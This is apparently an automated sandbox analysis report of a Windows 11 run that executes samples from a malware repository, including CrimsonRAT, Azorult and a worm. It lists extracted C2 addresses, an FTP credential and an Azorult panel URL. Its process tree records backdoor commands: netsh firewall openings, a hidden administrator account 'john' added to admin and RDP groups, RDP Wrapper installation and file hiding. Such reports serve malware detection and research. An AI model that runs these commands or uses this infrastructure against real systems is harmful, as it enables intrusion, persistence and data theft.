Analysis
-
max time kernel
418s -
max time network
414s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
14-04-2024 09:15
General
-
Target
http://gjg
Malware Config
Extracted
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
crimsonrat
185.136.161.124
Extracted
metasploit
encoder/call4_dword_xor
Extracted
azorult
http://boglogov.site/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CrimsonRAT main payload 1 IoCs
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Detect Lumma Stealer payload V4 4 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
Modifies firewall policy service 2 TTPs 8 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs 5 IoCs
-
Windows security bypass 2 TTPs 6 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
-
Modifies Installed Components in the registry 2 TTPs 2 IoCs
-
Modifies Windows Firewall 2 TTPs 28 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
ASPack v2.12-2.42 2 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Executes dropped EXE 23 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 62 IoCs
-
UPX packed file 8 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 5 IoCs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 1 IoCs
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 10 IoCs
-
Drops file in Program Files directory 31 IoCs
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 7 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 5 IoCs
-
Modifies data under HKEY_USERS 21 IoCs
-
Modifies registry class 7 IoCs
-
NTFS ADS 5 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 16 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://gjg1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe2313ab58,0x7ffe2313ab68,0x7ffe2313ab782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1540 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2136 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2984 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4172 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3208 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4480 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=1528 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4356 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3868 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2120 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4172 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2980 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4392 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=2972 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3256 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1040 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4764 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4424 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2456 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5900 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5864 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1400 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 --field-trial-handle=1812,i,15323649904173166071,17457498683407640404,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\DismountEnter.3gp2"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\CrimsonRAT.exe"1⤵
-
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\WindowsUpdate.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\WindowsUpdate.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 14522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1588 -ip 15881⤵
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Kolabc\Kobalc.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Kolabc\Kobalc.exe"1⤵
- Looks for VMWare Tools registry key
- Drops file in Windows directory
- NTFS ADS
-
C:\Windows\Fonts\wmsncs.exe"C:\Windows\Fonts\wmsncs.exe"1⤵
- Modifies WinLogon for persistence
- Modifies firewall policy service
- Modifies security service
- Windows security bypass
- Looks for VMWare Tools registry key
- Modifies Installed Components in the registry
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- NTFS ADS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 1013 BS2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 8080 PORT12⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set portopening TCP 8081 PORT22⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall add allowedprogram "C:\Windows\Fonts\wmsncs.exe" workstation ENABLE ALL2⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" firewall set allowedprogram "C:\Windows\Fonts\wmsncs.exe" workstation ENABLE ALL2⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- UAC bypass
- Windows security bypass
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
- Launches sc.exe
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
- Modifies Windows Firewall
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F5B2.tmp\F5B3.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Drops file in System32 directory
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
